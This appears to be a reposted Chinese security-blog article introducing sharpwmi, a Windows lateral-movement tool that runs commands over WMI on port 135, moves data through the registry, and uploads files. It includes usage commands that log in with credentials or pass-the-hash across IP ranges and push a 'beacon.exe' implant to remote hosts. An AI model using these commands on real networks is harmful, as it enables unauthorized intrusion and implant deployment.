正文

一个基于rpc的横向移动工具,具有上传文件和执行命令功能。

admin
admin V管理员 /0 评论 /51 阅读
1019
此篇文章发布距今已超过35天,您需要注意文章的内容或图片是否可用!
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本
公众号无关。

项目简介


这是一个基于135端口来进行横向移动的工具,具有执行命令上传文件功能,通过wmi来执行命令,通过注册表来进行数据传输.

项目描述

命令

sharpwmi.exe login 192.168.2.3 administrator 123 cmd whoamisharpwmi.exe login 192.168.2.3/24 administrator 123 cmd whoamisharpwmi.exe login 192.168.2.3-23 administrator 123 upload beacon.exe c:beacon.exesharpwmi.exe pth 192.168.2.3-192.168.2.77 cmd whoamisharpwmi.exe pth 192.168.2.3/255.255.255.0 upload beacon.exe c:beacon.exe

原理:

执行命令

   通过wmi来执行命令,server将命令结果存在本机注册表,然后client连接注册表进行读取命令结果

上传文件:

   client将需要上传的文件放到server的注册表里面,然后server通过powershell来操作注册表方式来取文件然后释放到本地

优点:

  • 不依赖139和445端口

缺点:

  • 目前只支持上传512kb以下的文件,因为注册表每个值值长度不能超过512kb。

  • 执行命令和上传文件都依赖powershell

todo:

  • 用添加增加多个值的方式来实现上传任意大小文件

  • 去除powershell依赖


下载地址

项目地址:https://github.com/idiotc4t/sharpwmi

添加管理微信进内部交流群

# 往期推荐
























推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网-ZhouSa.com